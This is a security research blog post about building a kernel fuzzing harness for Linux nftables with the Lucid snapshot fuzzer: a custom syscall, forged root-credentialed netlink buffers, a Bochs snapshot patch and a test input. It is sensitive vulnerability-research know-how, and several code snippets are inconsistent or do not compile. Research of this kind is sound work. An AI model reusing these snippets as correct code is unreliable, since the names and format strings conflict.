The Human Machine Interface

Lucid Dreams II: Harness Development

2025-10-13T00:00:00+00:00

Background

Last episode on the blog we took a shallow and broad approach to fuzzing several Netlink-plumbed subsystems like Netfilter, Route, Crypto, and Xfrm. This endeavor wasn’t necessarily an earnest bug finding mission since we mostly wanted to just see how fuzzing a real target with Lucid would go and what things would need tweaking. We ended up changing quite a bit of the core-fuzzer features, specifically Redqueen issues, and were able to improve the fuzzer quite a bit. We modularized the mutator component of Lucid so now writing your own fuzzer for Lucid is as simple as implementing your own mutator. We can extend this even more, and will, by enabling the user to pass command line arguments directly to the bespoke mutator.

So now you can conceive of the main Lucid core components as a fuzzing engine and the mutator as the “fuzzer” because it is responsible for all of the target-specific characteristics. So for example, if we were to fuzz Chrome in Lucid, you would write a “Chrome fuzzer” by implementing your own fuzzing harness for Chrome and then implementing your own mutator to generate and mutate inputs.

We now switch to a more earnest bug finding mode of operation. I’ve decided for this series to focus on fuzzing nftables for a few different reasons:

nftables doesn’t have as many eyeballs on it anymore, at least publicly, because kCTF has changed its rules around unprivileged usernamespaces which as severely decreased the value of exploitable bugs in surfaces that live behind those namespaces, so less competition
nftables is extremely complex. There are serveral hierarchical structures and states that can occur and in addition, the code exists on two planes: a configuration plane responsible for creating these nested and complex resources and a data plane responsible for interacting with those created structures. For the early going, we’re going to be focusing exclusively on the control plane with designs on implementing data plane interactions later
nftables has a history of bugs, so much so that it was explicitly disabled in kCTF’s bounty program
Syzkaller fuzzes nftables already, but if you look at the types of messages it is able to generate, it tends to favor syntactically-valid but semantically-invalid inputs. For instance, it will send a well-formed message to create a resource, but the argument values themselves may be nonsense. Further, syzkaller currently has no way to track the state of resources if they were successfully created. So sequences like create resource -> modify resource -> use resource -> destroy resource are not possible currently unless they happen by sheer random chance which is highly unlikely
lastly, this represents a fun engineering challenge. Creating a mutator/generator that is able to achieve deep stateful coverage of nftables will be something unique as far as public research goes I think

Adding Custom Syscall

The first thing we need is a way to interact with the nftables subsystem. My goto strategy here is to just create a custom syscall that usually takes a userland buffer pointer and a data length. This allows us to send an input from userland and have it traverse the harness and then hit the target subsystem. Now, this is not how I want to fuzz, but it is a useful setup for debugging, collecting coverage metrics for visualization, and also reproducing crashes. Ideally the flow looks like this:

Send data buffer via syscall
Context-switch to kernel mode as harness is about to parse input
[FUZZING-ONLY] Take snapshot
Harness parses input and dispatches to target subsystem
[FUZZING-ONLY] Reset snapshot
Return to userland

This setup gives us the best of both worlds, we can easily debug and play with our harness from userland and we can also fuzz completely in kernel context without having to emulate any expensive context switches per fuzzcase.

To add a new syscall, we have to edit the syscall_64.tbl file found in linux_version/arch/x86/entry/syscalls, wherein I added a new syscall entry right after the last syscall entry:

...
common	removexattrat		sys_removexattrat
common	open_tree_attr		sys_open_tree_attr
common	file_getattr		sys_file_getattr
common	file_setattr		sys_file_setattr
common  lucid_fuzz          sys_lucid_fuzz

Now we have to define it in the linux_version/include/linux/syscalls.h file:

...
asmlinkage long sys_geteuid16(void);
asmlinkage long sys_getgid16(void);
asmlinkage long sys_getegid16(void);
asmlinkage long sys_lucid_fuzz(const void __user *data, size_t len);

Because we want to fuzz nftables, I decided to implement the syscall itself in a new file called lucid_fuzz.c and placed that inside linux_version/net/netfilter folder:

#include 
#include 
#include 

SYSCALL_DEFINE2(lucid_fuzz, const void __user *, data, size_t, len)
{
    printk("Inside lucid fuzz!\n");
	return 0;
}

Now we have to tell the kernel to compile this source file. This is accomplished by editing the folder’s Makefile to ensure that our lucid_fuzz.c file is used to create an object file. I changed the top line of the Makefile in my kernel version 6.17 to this:

netfilter-objs := core.o nf_log.o nf_queue.o nf_sockopt.o utils.o lucid_fuzz.o

When we build the kernel, we should see this in the output

  CC      net/netfilter/lucid_fuzz.o

To interact with the syscall, we’ll need a userland program. This is a small program to read data from standard in (easy to use in the future to reproduce crashes or replay fuzzing inputs) and then send that data via the syscall to the kernel:

// gcc harness.c -o harness -static
#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#ifndef __NR_lucid_fuzz
#define __NR_lucid_fuzz 470 // Our syscall number
#endif

int main(void) {
    // Start at a page, we'll double this if we need more memory
    size_t cap = 4096;
    size_t len = 0;
    const size_t MAX_CAP = 64 * 1024 * 1024; // Shouldn't need more than this?

    // Create a buffer to hold data
    uint8_t *buf = malloc(cap);
    if (!buf) {
        perror("malloc");
        return 1;
    }

    // Read until we can't
    while (1) {
        // Grab data from standard in, taking into account the offset as determined
        // by `len`
        ssize_t n = read(STDIN_FILENO, buf + len, cap - len);

        // If we got bytes...
        if (n > 0) {
            // Adjust offset
            len += (size_t)n;

            // See if we hit the current cap
            if (len == cap) {

                // Hit sanity check, bail
                if (cap >= MAX_CAP) {
                    fprintf(stderr, "refusing to grow beyond %zu bytes\n", MAX_CAP);
                    free(buf);
                    return 1;
                }

                // Create new backing buffer
                size_t ncap = cap * 2;

                // Lol 
                if (ncap <= cap) {
                    fprintf(stderr, "size overflow\n");
                    free(buf);
                    return 1;
                }

                // Make sure we didn't do an oopsie
                if (ncap > MAX_CAP) ncap = MAX_CAP;
                uint8_t *tmp = realloc(buf, ncap);
                if (!tmp) {
                    perror("realloc");
                    free(buf);
                    return 1;
                }

                // Update 
                buf = tmp;
                cap = ncap;
            }
            continue;
        }

        // Done reading: EOF
        if (n == 0) break;

        // Failed to read but just because of an interrupt, try again
        if (n < 0 && errno == EINTR) continue;
        
        // Bail on any other errors
        if (n < 0) {
            perror("read");
            free(buf);
            return 1;
        }
    }

    // Call our custom syscall 
    long ret = syscall(__NR_lucid_fuzz, buf, (size_t)len);

    // Need to make sure that our syscall returns meaningful data on error
    if (ret == -1) {
        int e = errno;
        fprintf(stderr, "lucid_fuzz failed: %s\n", strerror(e));
        free(buf);
        return 1;
    }

    printf("lucid_fuzz returned %ld\n", ret);
    free(buf);
    return 0;
}

Now we can test in qemu-system:

root@syzkaller:~# echo "lol" | harness
[  256.492957] Inside lucid fuzz!
lucid_fuzz returned 0
root@syzkaller:~# 

So everything works with the syscall, now it’s time to make it an actual fuzzing harness.

Deciding Input Format

We want to be able to create stateful inputs for nftables. This obviously means we need enough runway initially in our inputs to build up complex state! This seems obvious and simple, but I think it’s hard to actually implement correctly. We have to consider various things like:

Not all “state” is “good state”: Just because an input can create 4096 nft_table data structures, doesn’t mean that that’s interesting from a vulnerability research perspective
Short inputs are not likely going to create complex state: We need to have somewhat long inputs in order to build up state
Extremely large inputs may be meaningless: There may not be any meaningful difference between short and long inputs when the short input is long enough to create “good state” and we may end up spending tons of CPU cycles doing nothing interesting and working on enormous inputs

With these things in mind, let’s first take a cautious approach and make sure we can generate long inputs some of the time, but most of the time focus on relatively normal sized inputs.

`nftables` Messages

nftables expects Netlink messages that are formatted a certain way. It has two modes of messaging as far as I can tell: standalone messages, which are simple messages like “object getters” and batched messages, which are for object creation/modification/deletion. They have gone with a design where anything that can modify state is subject to batching and everything that is read-only can be a standalone message. In the batch mode of operation, nftables will have something like a “staging” phase, where it parses the messages in the batch and validates them. While it’s validating each individual batched message, it makes sure that the resources being created/manipulated are sane and actually exist and are modifiable. nftables will stage all the changes and then if a single message fails in the batch, will attempt to roll back all of those staged changes. If batch message parsing succeeds however, it moves into a “commit” phase and makes the changes.

So basically, our input generator will need to be capable of sending batches of nftables requests with some simple read-only requests sprinkled in rarely. I decided to follow a high level input shape that is very similar to our last blogpost for this purpose. We will do the following:

Have Lucid inject a buffer of bytes at a location in Bochs’ memory. This is standard and how you want to separate duties between Lucid the fuzzing engine and Lucid’s mutators/generators. Let Lucid the fuzzing engine inject a byte blob, let the harness/mutator/generator make sense of the blob.
We will pre-allocate socket buffer structures skb(s) in the kernel so that we don’t do any large allocations in the fuzzing loop
The harness will parse the byte blob, and package each input series from the mutator in an skb and ship the skb off to nftables for parsing
We will separate series of nftables messages into what we’ll call “envelopes”. Last blogpost we called them “messages” but because Netlink also operates on “messages” this nomenclature is confusing.

Our input then will contain two different data structures as the harness sees things:

// An input structure
struct lf_input {
	u32 total_len;
	u32 num_envs;
	u8 data[];
};

// An envelope structure
struct lf_envelope {
	u32 len;
	u8 data[];
};

This is very similar to our last blogpost, but with some key changes to the envelope structure. So in practice, an input will always have a single struct lf_input structure at its beginning describing the input in its entirety, and then, up to the max number of envelopes, a series of struct lf_envelope structures containing the actual Netlink messages for nftables in its data member. So an input may look like:

[
	[lf_input: total_len=4096, num_msgs=2]
		[lf_envelope: len=2048, ]
		[lf_envelope: len=2048, ]
]

Remember: the core Lucid components know nothing about this structure, Lucid is only responsible for injecting the input and its length into the target at a location in memory. It’s up to the mutator and the harness to make sense of the structure.

So now let’s implement the harness with this in mind. It will need to receive the bytes, parse them, wrap each envelope’s data in an skb and send the skb to nftables.

Reaching `nftables`

The normal path user input takes to nftables is something like:

userland process creates an NETLINK_NETFILTER Netlink socket
userland process sends request via sendmsg syscall or similar (maybe sendto) via the Netlink socket
those bytes get wrapped in an skb in netlink_sendmsg
based on the socket’s protocol type, netlink_sendmsg will find the Netfilter’s registered kernel socket that was initialized at kernel boot, the socket has a callback attached to it called .input that is to be invoked when there is data ready for it
The callback, which points to nfnetlink_rcv, is invoked and receives the skb holding our data from userland

We can do similar things, but make it more direct since we know the destination in our harness is nftables. We can:

Pre-allocate skb structures to hold our envelopes
Parse the lf_input, and by included lf_envelope:
Stuff the envelope’s data into an skb
Send the skb directly to nfnetlink_rcv
Repeat, go back to the 3

Harness Init Code

Let’s go ahead and fill out the logic for the initialization routine of our custom syscall, this is code that will be invoked once before we start fuzzing and will not occur in the fuzzing loop. This is code that is meant to set up everything we need for the harness to work appropriately. This is where we will setup the skbs and to do so, we’ll need to define some constants that describe maximum input shapes. The first constant we need to set is the MAX_NUM_ENVELOPES, this is going to tell us how many struct lf_envelope structures can exist in an struct lf_input. We’ll also need to know the MAX_ENVELOPE_LEN which will obviously describe how big these envelopes’ data payload can be. Finally, as a byproduct of both the maximum number of envelope structures and their maximum length, we’ll deduce the MAX_INPUT_LEN, which is the largest possible size we can achieve for the lf_input->total_len value.

For now, let’s go ahead and say that we can have up to 24 envelopes, and each one can be up to 8192 bytes. In the mutator, well define min/max thresholds where we mostly uniformly distribute size selection between those two thresholds with a small possibility of going lower or higher than them. So most of the time we’ll do at least 8 envelopes and less than or exactly 16 envelopes. Something like that. We’ll make 1-7 and 17-24 very rare. Same with the sizes, well try not to send an insane amount of nftables messages per envelope and approach the 8k max. But this is for a later blogpost on the mutator.

With the constants in mind we can build. We can do all of this in af_netlink.c in /net/netlink because it has all of the things we need access to and makes everything easy. So we’ll implement lf_init in there, which means we need access to lucid_init in our lucid_fuzz.c stand alone source file, so we’ll change that to:

#include 
#include 
#include 

// These will be defined in /include/net/lucid_fuzz.h
extern int lucid_fuzz_init(const void __user *data, size_t len);

SYSCALL_DEFINE2(lucid_fuzz, const void __user *, data, size_t, len)
{
    int ret = 0;

    printk("Inside lucid fuzz!\n");
    printk("Calling lucid_fuzz_init...\n");
    ret = lucid_fuzz_init(data, len);
    if (ret)
        goto done;

done:
	return ret;
}

Now we’ll need to create that header file in /include/net/lucid_fuzz.h:

/* SPDX-License-Identifier: GPL-2.0 */
#ifndef _NET_LUCID_FUZZ_H
#define _NET_LUCID_FUZZ_H

int lucid_fuzz_init(const void __user *data, size_t len);

#endif /* _NET_LUCID_FUZZ_H */

Now we can include that header in af_netlink.c. And we get started in that source file with our defines of our constants we discussed:

/*************** Start of Lucid Fuzzing Harness *****************************/
#define LF_MAX_NUM_ENVS 24UL // Number of envelopes in an input
#define LF_MAX_ENV_LEN 8192UL // Number of bytes in an envelope payload 
#define LF_INPUT_HDR_SIZE (sizeof(u32) * 2) // lf_input->total_len, num_envs
#define LF_ENV_HDR_SIZE (sizeof(u32)) // lf_envelope->len
#define LF_MAX_TOTAL_ENV ((LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS)
#define LF_MAX_INPUT_LEN (LF_MAX_TOTAL_ENV + LF_INPUT_HDR_SIZE)

Next, I defined the LUCID_SIGNATURE that Lucid scans for when trying to decide where to inject inputs. It knows the layout of the struct lf_fuzzcase so it knows that directly after the signature portion it has a length field and then the variable length data field where it inserts the raw bytes:

// Structure that describes an input as Lucid sees it
struct lf_fuzzcase {
	unsigned char signature[16];
	size_t input_len;
	u8 input[LF_MAX_INPUT_LEN];
};

// Create instance of the struct
struct lf_fuzzcase fc = {
	.signature = LUCID_SIGNATURE,
	.input_len = 0,
	.input = { 0 }	/* Where Lucid injects an input */
};

Then we define some globals that we need to initialize:

handler: This is a function pointer basically to the nfnetlink_rcv function that we look up by protocol in the init namespace
kern_sock: This is the struct sock that is registered during kernel boot for the Netfilter subsystem to receive data from userland (and I guess kernel threads?)
skbs: Just a flat buffer of the skb structures we’ll need to use to wrap our envelope data, the harness exchanges envelopes by skb structures

Finally the initialization routine is thus:

// The function pointer we send the skbs to, the netlink rcv handler for
// netfilter nfnetlink_rcv
void *handler = NULL;

// The kernel-registered socket waiting for input from us
struct sock *kern_sock = NULL;

// Pool of skbs we use to store data in envelopes
struct sk_buff *skbs[LF_MAX_NUM_ENVS] = { 0 }; 

// Our initialization function, called before we do any fuzzing
int lucid_fuzz_init(const void __user *data, size_t len) {
	int err = 0;
	int i = 0;
	struct sk_buff *skb = NULL;

	printk("Hello from lucid_fuzz_init\n");
	printk("LF_MAX_INPUT_LEN is: %lu\n", LF_MAX_INPUT_LEN);

	// Copy the user data over to the fuzzcase instance if there is any
	if (len > 0 && len <= LF_MAX_INPUT_LEN) {
		if (copy_from_user(
			fc.input, data, len
		))
		{
			err = -EFAULT;
			goto done;
		}
		fc.input_len = len;
	}

	// Doing this how other kernel code does it, lock the global table
	netlink_table_grab();

	// Pre-set the err as if we failed to find the handler for NETFILTER
	err = -ENOENT;

	// Check to see if the handler is registered
	if (!nl_table[NETLINK_NETFILTER].registered) {
		netlink_table_ungrab();
		goto done;
	}

	// Grab the kernel socket
	kern_sock = netlink_lookup(&init_net, NETLINK_NETFILTER, 0);
	if (!kern_sock) {
		netlink_table_ungrab();
		goto done;
	}

	// Grab that .input handler
	handler = nlk_sk(kern_sock)->netlink_rcv;
	if (!handler) {
		netlink_table_ungrab();
		goto done;
	}

	// Ungrab the table we're done with it
	netlink_table_ungrab();

	// Pre-set
	err = -ENOMEM;

	// Create all of the socket buffers we need and store them
	for (i = 0; i < LF_MAX_NUM_ENVS; i++) {
		skb = alloc_skb(LF_MAX_ENV_LEN, GFP_KERNEL);
		// If we failed, unroll all the previous allocations
		if (!skb) {
			while (--i >= 0) {
				kfree_skb(skbs[i]);
				skbs[i] = NULL;
			}
			goto done;
		}

		// Initialize what we need to look legit
		skb->pkt_type = PACKET_HOST;
		skb->sk = kern_sock;
		NETLINK_CB(skb).portid = 0x1337;
		NETLINK_CB(skb).dst_group = 0;
		NETLINK_CB(skb).creds.uid = GLOBAL_ROOT_UID;
		NETLINK_CB(skb).creds.gid = GLOBAL_ROOT_GID;
		NETLINK_CB(skb).flags = NETLINK_SKB_DST;

		// Store the skb
		skbs[i] = skb;
	}

	// We are so done dude, it worked
	err = 0;

done:
	return err;
}

This should initialize all of the structures we need to start actually parsing inputs and dispatching them in the main harness function.

Main Parsing Routine

We’ve reached the point now where the input buffer global is loaded with data and we know the address of the function to invoke to dispatch the data to Netfilter. We’ve also initialized the socket buffers we’re going to use to do the transportation. We need to describe what an input looks like, so let’s define our input structures.

// Define our input structures
struct lf_input {
	u32 total_len;
	u32 num_envs;
	u8 data[];
};

struct lf_envelope {
	u32 len;
	u8 data[];
};

The first thing we do in the main loop is take the snapshot that Bochs will save to disk. The Lucid workflow is something like:

develop environment, harness
put a special NOP operation in the harness where you want to snapshot fuzz from (xchg dx, dx)
run the environment/harness in the gui-bochs. This is relatively normal Bochs binary built with GUI support that is supposed to be user-friendly and allow you to dump this Bochs snapshot to disk
the Rust fuzzer binary, lucid-fuzz can then take that Bochs snapshot on disk, and resume its execution with a purpose-built lucid-bochs binary. This will call into the Lucid fuzzer before it emulates the first instruction and create a new kind of snapshot that Lucid can understand and restore every fuzzing iteration.

Below is the code I’ve added to Bochs to save the Bochs snapshot to disk when we encounter the xchg dx, dx NOP, where i is a variable name for the instruction structure:

#if BX_SNAPSHOT
  // Check for take snapshot instruction `xchg dx, dx`
  if ((i->src() == i->dst()) && (i->src() == 2)) {
    BX_COMMIT_INSTRUCTION(i);
    if (BX_CPU_THIS_PTR async_event)
      return;
    ++i;
    char save_dir[] = "/tmp/lucid_snapshot";
    mkdir(save_dir, 0777);
    printf("Saving Lucid snapshot to '%s'...\n", save_dir);
    if (SIM->save_state(save_dir)) {
      printf("Successfully saved snapshot\n");
      sleep(2);
      exit(0);
    }
    else {
      printf("Failed to save snapshot\n");
    }
    BX_EXECUTE_INSTRUCTION(i);
  }
#endif

Then we get around to making sure we have enough bytes to form the metadata structure (lf_input) and sanity check its values before moving on to the nested envelopes. You’ll notice that all error paths are return 1;, this is so that during fuzzing and mutator development, we skip over the snapshot restore NOP instruction at the end of the main fuzzing loop in the harness. This cascade of timeouts will let us know that we have a bug in our mutator. Here is the main loop:

// Main input processing logic
int lucid_fuzz_handle_input(void) {
	struct lf_input *input = NULL;
	struct lf_envelope *env = NULL;
	struct sk_buff *fuzz_skb = NULL;
	u32 remaining = 0;
	u32 offset = 0;

	printk("Hello from lucid_fuzz_handle_input\n");

	/** LUCID TAKES SNAPSHOT HERE **/
	// This special NOP instruction, when interpreted by Bochs will cause
	// Bochs to save a snapshot of its state to disk that Lucid will be able
	// to resume in its purpose built version of Bochs called `lucid_bochs`
	asm volatile("xchgw %dx, %dx");

	// Make sure we enough bytes to construct the input metadata
	if (fc.input_len < sizeof(lf_input))
		return 1;

	// Cast the data to our metadata struct
	input = (struct lf_input *)fc.input;

	// Sanity check the values
	if (input->total_len != fc.input_len || input->total_len > LF_MAX_INPUT_SIZE)
		return 1;

	// Sanity check the number of messages
	if (input->num_msgs > LF_MAX_NUM_ENVS || input->num_msgs == 0)
		return 1;

	// Check how many remaining bytes we have, and subtract what we already
	// consumed with the input metadata
	remaining = input->total_len;
	remaining -= LF_INPUT_HDR_SIZE;

	// Start tracking an offset into the byte buffer where we're reading from
	offset = LF_INPUT_HDR_SIZE;

Then we can start iterating through envelopes and parsing them. Each successfully parsed envelope gets turned into an skb and dispatched to nftables:

// Iterate through the envelopes and parse each one
	for (i = 0; i < input->num_envs; i++) {
		// Make sure we have enough data remaining to parse an envelope metadata
		if (remaining < LF_ENV_HDR_SIZE)
			return 1;

		// We can at least read the length field, and sanity check it
		env = (struct lf_envelope *)(fc.input + offset);
		if (env->len > LF_MAX_MSG_SIZE || env->len == 0)
			return 1;

		// Consume those bytes
		remaining -= LF_ENV_HDR_SIZE;

		// Make sure we can read that much data
		if (remaining < env->len)
			return 1;

		// We have enough data left, create the skb for this envelope
		fuzz_skb = create_fuzz_skb(env, i);
		if (!fuzz_skb)
			return 1;

		// Dispatch the fuzz_skb to nftables!
		dispatch_skb(fuzz_skb);

		// Update our offset
		offset += (LF_ENV_HDR_SIZE + env->len);

		// Update remaining
		remaining -= env->len;

	}

We initialize the fuzz_skb in this function. This is where we set the socket buffer up with all the information we need to successfully get received and parsed by nftables. We exchange the “envelope” wrapper for the socket buffer wrapper instead:

// Creates a socket buffer filled with fuzz message
static struct sk_buff *create_fuzz_skb(struct lf_envelope *env, int idx) {
	struct sk_buff *skb = NULL;

	// Sanity check
	if (idx >= LF_MAX_NUM_ENVS)
		return NULL;

	// Grab socket buffer from global buf
	skb = skbs[idx];

	// Set the socket buffer's sock to the kernel sock for Netfilter
	skb->sk = kern_sock;

	// Inject fuzz data and set sizes
	memcpy(skb_put(skb, env->len), env->data, env->len);

	return skb;
}

The dispatching of the skb is simple, we just cast the handler to the right function pointer signature and then invoke it with the skb:

// Dispatches the skb to the appropriate netlink recv handler
static void dispatch_skb(struct sk_buff *skb) {
	// Create function pointer, msg->protocol already sane
	void (*rcv)(struct sk_buff *) = handler;

	// Dispatch!
	rcv(skb);
}

The main fuzzing loop then of course restores the snapshot after we’re done parsing envelopes:

// Done parsing envelopes, check if we have remaining bytes
	if (remaining)
		return 1;

	/** LUCID RESTORES SNAPSHOT **/
	asm_volatile("xchgw %bx, %bx");

	// Finally done
	return 0;

We’ll save the rest of the snippets for the source files I’ll post at the end.

Testing Harness

Everything is wired up, so now we can send inputs via the harness userland binary we compiled. Let’s check out strace on the nft userland utility and see where the Netlink message to create an nft_table is sent over the Netlink socket. Our nft command is: nft add table inet fuzz:

// Create the Netlink socket of the protocol type NETLINK_NETFILTER
socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER) = 3

// Send the Netlink message to create a table over that socket fd we just created
sendto(3, [{nlmsg_len=20, nlmsg_type=NFNL_SUBSYS_NFTABLES<<8|NFT_MSG_GETGEN, nlmsg_flags=NLM_F_REQUEST, nlmsg_seq=0, nlmsg_pid=0}, {nfgen_family=AF_UNSPEC, version=NFNETLINK_V0, res_id=htons(0)}], 20, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000}, 12) = 20
recvmsg(3, {msg_name={sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000}, msg_namelen=12, msg_iov=[{iov_base=[{nlmsg_len=44, nlmsg_type=NFNL_SUBSYS_NFTABLES<<8|NFT_MSG_NEWGEN, nlmsg_flags=0, nlmsg_seq=0, nlmsg_pid=125392}, {nfgen_family=AF_UNSPEC, version=NFNETLINK_V0, res_id=htons(103)}, [[{nla_len=8, nla_type=0x1}, "\x00\x00\x00\x67"], [{nla_len=8, nla_type=0x2}, "\x00\x01\xe9\xd0"], [{nla_len=8, nla_type=0x3}, "\x6e\x66\x74\x00"]]], iov_len=69631}], msg_iovlen=1, msg_controllen=0, msg_flags=0}, 0) = 44

So it happens during sendmsg syscall, so what I did was just write an LD_PRELOAD shared object to hexdump the iovec data sent over sendmsg. So now I can get a hexdump -C style output for the nft message:

LD_PRELOAD=$PWD/hexdump_netlink.so nft add table inet fuzz
00000000  14 00 00 00 10 00 01 00  00 00 00 00 00 00 00 00 |................|
00000010  00 00 0a 00 28 00 00 00  00 0a 01 00 01 00 00 00 |....(...........|
00000020  00 00 00 00 01 00 00 00  09 00 01 00 66 75 7a 7a |............fuzz|
00000030  00 00 00 00 08 00 02 00  00 00 00 00 14 00 00 00 |................|
00000040  11 00 01 00 02 00 00 00  00 00 00 00 00 00 0a 00 |................|

Now we know what a legit nftables message looks like and we can wrap it in our lf_input and lf_envelope structures and test the harness! I took that output and just hardcoded it into a janky Python script to dump the binary to the terminal:

import struct
import sys

# Dumped message
msg_str = [
    "00000000  14 00 00 00 10 00 01 00  00 00 00 00 00 00 00 00 |................|",
    "00000010  00 00 0a 00 28 00 00 00  00 0a 01 00 01 00 00 00 |....(...........|",
    "00000020  00 00 00 00 01 00 00 00  09 00 01 00 66 75 7a 7a |............fuzz|",
    "00000030  00 00 00 00 08 00 02 00  00 00 00 00 14 00 00 00 |................|",
    "00000040  11 00 01 00 02 00 00 00  00 00 00 00 00 00 0a 00 |................|"
]

# Byte string we'll fill
all_bytes = b''
for line in msg_str:
    # Skip the offset stuff
    hex_start = line[10:]

    # Cut off the back ascii stuff
    hex_str = hex_start[:len(hex_start) - 18]

    # Remove the spaces
    hex_str = hex_str.replace(" ", "")

    # Start appending
    all_bytes += bytes.fromhex(hex_str)

# Now with bytes, wrap that in envelope
envelope_len = len(all_bytes)
envelope = struct.pack(', envelope_len) + all_bytes

# Now wrap that in an lf_input
num_envs = 1
total_len = 8 # Metadata for lf_input
total_len += len(envelope)
lf_input = struct.pack(', total_len, num_envs) + envelope

# Write that to stdout
sys.stdout.buffer.write(lf_input)

We can now pipe that to base64 and then pipe that to the harness for testing:

[devbox:~/nft_fuzzing]$ python3 wrapper.py | base64
XAAAAAEAAABQAAAAFAAAABAAAQAAAAAAAAAAAAAACgAoAAAAAAoBAAEAAAAAAAAAAQAAAAkAAQBmdXp6AAAAAAgAAgAAAAAAFAAAABEAAQACAAAAAAAAAAAACgA=

Then when we run echo "" | harness on the qemu-system running our custom kernel, we get the following kernel logs:

[   23.347957] Inside lucid fuzz!
[   23.349015] Calling lucid_fuzz_init...
[   23.350233] Hello from lucid_fuzz_init
[   23.351399] LF_MAX_INPUT_LEN is: 196712
[   23.355266] Hello from lucid_fuzz_handle_input
[   23.359789] Calling lucid_fuzz_cleanup...
lucid_fuzz returned 0

So the harness works!

Conclusion

Hopefully this helps you understand how to write a harness for Lucid. We needed to:

identify a way to inject raw input bytes into kernel memory
take a snapshot with our special NOP instruction
implement a custom protocol that our harness can understand so that it can parse the raw input bytes into something that can be sent to the target
reset the snapshot with our special NOP instruction
cleanup all the resources in the harness so we can use it for debugging as well.

I’ve pasted the full harness code that I added in af_netlink.c below, cheers:

/*************** Start of Lucid Fuzzing Harness *****************************/
#define LF_MAX_NUM_ENVS 24UL // Number of envelopes in an input
#define LF_MAX_ENV_LEN 8192UL // Number of bytes in an envelope payload 
#define LF_INPUT_HDR_SIZE (sizeof(u32) * 2) // lf_input->total_len, num_envs
#define LF_ENV_HDR_SIZE (sizeof(u32)) // lf_envelope->len
#define LF_MAX_TOTAL_ENV ((LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS)
#define LF_MAX_INPUT_LEN (LF_MAX_TOTAL_ENV + LF_INPUT_HDR_SIZE)

// Used by Lucid when scanning for where to inject the input 
#define LUCID_SIGNATURE { 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, \
                          0x13, 0x38, 0x13, 0x38, 0x13, 0x38, 0x13, 0x38 }

// Structure that describes an input as Lucid sees it
struct lf_fuzzcase {
	unsigned char signature[16];
	size_t input_len;
	u8 input[LF_MAX_INPUT_LEN];
};

// Create instance of the struct
struct lf_fuzzcase fc = {
	.signature = LUCID_SIGNATURE,
	.input_len = 0,
	.input = { 0 }	/* Where Lucid injects an input */
};

// The function pointer we send the skbs to, the netlink rcv handler for
// netfilter nfnetlink_rcv
void *handler = NULL;

// The kernel-registered socket waiting for input from us
struct sock *kern_sock = NULL;

// Pool of skbs we use to store data in envelopes
struct sk_buff *skbs[LF_MAX_NUM_ENVS] = { 0 }; 

// Our initialization function, called before we do any fuzzing
int lucid_fuzz_init(const void __user *data, size_t len) {
	int err = 0;
	int i = 0;
	struct sk_buff *skb = NULL;

	printk("Hello from lucid_fuzz_init\n");
	printk("LF_MAX_INPUT_LEN is: %lu\n", LF_MAX_INPUT_LEN);

	// Copy the user data over to the fuzzcase instance if there is any
	if (len > 0 && len <= LF_MAX_INPUT_LEN) {
		if (copy_from_user(
			fc.input, data, len
		))
		{
			err = -EFAULT;
			goto done;
		}
		fc.input_len = len;
	}

	// Doing this how other kernel code does it, lock the global table
	netlink_table_grab();

	// Pre-set the err as if we failed to find the handler for NETFILTER
	err = -ENOENT;

	// Check to see if the handler is registered
	if (!nl_table[NETLINK_NETFILTER].registered) {
		netlink_table_ungrab();
		goto done;
	}

	// Grab the kernel socket
	kern_sock = netlink_lookup(&init_net, NETLINK_NETFILTER, 0);
	if (!kern_sock) {
		netlink_table_ungrab();
		goto done;
	}

	// Grab that .input handler
	handler = nlk_sk(kern_sock)->netlink_rcv;
	if (!handler) {
		netlink_table_ungrab();
		goto done;
	}

	// Ungrab the table we're done with it
	netlink_table_ungrab();

	// Pre-set
	err = -ENOMEM;

	// Create all of the socket buffers we need and store them
	for (i = 0; i < LF_MAX_NUM_ENVS; i++) {
		skb = alloc_skb(LF_MAX_ENV_LEN, GFP_KERNEL);
		// If we failed, unroll all the previous allocations
		if (!skb) {
			while (--i >= 0) {
				kfree_skb(skbs[i]);
				skbs[i] = NULL;
			}
			goto done;
		}

		// Initialize what we need to look legit
		skb->pkt_type = PACKET_HOST;
		skb->sk = kern_sock;
		NETLINK_CB(skb).portid = 0x1337;
		NETLINK_CB(skb).dst_group = 0;
		NETLINK_CB(skb).creds.uid = GLOBAL_ROOT_UID;
		NETLINK_CB(skb).creds.gid = GLOBAL_ROOT_GID;
		NETLINK_CB(skb).flags = NETLINK_SKB_DST;

		// Store the skb
		skbs[i] = skb;
	}

	// We are so done dude, it worked
	err = 0;

done:
	return err;
}

// Define our input structures
struct lf_input {
	u32 total_len;
	u32 num_envs;
	u8 data[];
};

struct lf_envelope {
	u32 len;
	u8 data[];
};

// Creates a socket buffer filled with fuzz message
static struct sk_buff *create_fuzz_skb(struct lf_envelope *env, int idx) {
	struct sk_buff *skb = NULL;

	// Sanity check
	if (idx >= LF_MAX_NUM_ENVS)
		return NULL;

	// Grab socket buffer from global buf
	skb = skbs[idx];

	// Set the socket buffer's sock to the kernel sock for Netfilter
	skb->sk = kern_sock;

	// Inject fuzz data and set sizes
	memcpy(skb_put(skb, env->len), env->data, env->len);

	return skb;
}

// Dispatches the skb to the appropriate netlink recv handler
static void dispatch_skb(struct sk_buff *skb) {
	// Create function pointer, msg->protocol already sane
	void (*rcv)(struct sk_buff *) = handler;

	// Dispatch!
	rcv(skb);
}

// Main input processing logic
int lucid_fuzz_handle_input(void) {
	int i = 0;
	struct lf_input *input = NULL;
	struct lf_envelope *env = NULL;
	struct sk_buff *fuzz_skb = NULL;
	u32 remaining = 0;
	u32 offset = 0;

	printk("Hello from lucid_fuzz_handle_input\n");

	/** LUCID TAKES SNAPSHOT HERE **/
	// This special NOP instruction, when interpreted by Bochs will cause
	// Bochs to save a snapshot of its state to disk that Lucid will be able
	// to resume in its purposbe built version of Bochs called `lucid_bochs`
	asm volatile("xchgw %dx, %dx");

	// Make sure we enough bytes to construct the input metadata
	if (fc.input_len < sizeof(struct lf_input))
		return 1;

	// Cast the data to our metadata struct
	input = (struct lf_input *)fc.input;

	// Sanity check the values
